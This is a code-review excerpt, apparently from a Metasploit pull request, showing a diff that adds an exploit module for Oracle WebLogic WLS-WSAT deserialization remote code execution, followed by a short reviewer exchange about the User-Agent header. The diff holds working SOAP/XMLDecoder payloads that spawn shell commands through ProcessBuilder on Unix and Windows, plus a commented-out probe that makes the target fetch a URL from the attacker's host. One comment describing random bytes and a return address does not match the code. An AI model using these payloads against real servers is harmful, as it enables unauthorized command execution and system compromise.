modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,162 @@
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>/bin/sh</string>
+            </void>
+            <void index="1">
+              <string>-c</string>
+            </void>
+            <void index="2">
+              <string>#{cmd_payload}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  # Generate a payload which will execute on a Windows machine using cmd
+  def windows_payload
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>cmd</string>
+            </void>
+            <void index="1">
+              <string>/c</string>
+            </void>
+            <void index="2">
+              <string>#{cmd_payload}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+# Not sure how to catch the response, so I'll leave this here in case someone can help
+#   def check_payload
+#     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+#   <soapenv:Header>
+#     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+#       <java version="1.8" class="java.beans.XMLDecoder">
+#         <object id="url" class="java.net.URL">
+#           <string>http://{lhost}:{lport}/{random_uri}</string>
+#         </object>
+#         <object idref="url">
+#           <void id="stream" method = "openStream" />
+#         </object>
+#       </java>
+#     </work:WorkContext>
+#     </soapenv:Header>
+#   <soapenv:Body/>
+# </soapenv:Envelope>}
+#   end
+
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    target_os = datastore['TARGET'].to_i
+
+    xml_payload = ''
+    if target_os == 0
+      xml_payload = windows_payload
+    else
+      xml_payload = unix_payload
+    end
+
+    send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'data'     => xml_payload,
+      'ctype'    => 'text/xml;charset=UTF-8',
+      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
```

Comment:
Nice module! I am not sure if you know this already, but when you use #send_request_cgi, there should be an default user-agent already. The value also should be configurable for the user from msfconsole. Is there a reason why you had to hardcode this?

Reply:
No reason whatsoever, I just didn't know that was the case. So just removing this and add the `OptString` for `UserAgent` or does it automatically get added?

Reply:
Ah, it was in `show advanced`. This has been removed so that it can be handled via `#send_request_cgi` through the existing option

Reply:
👍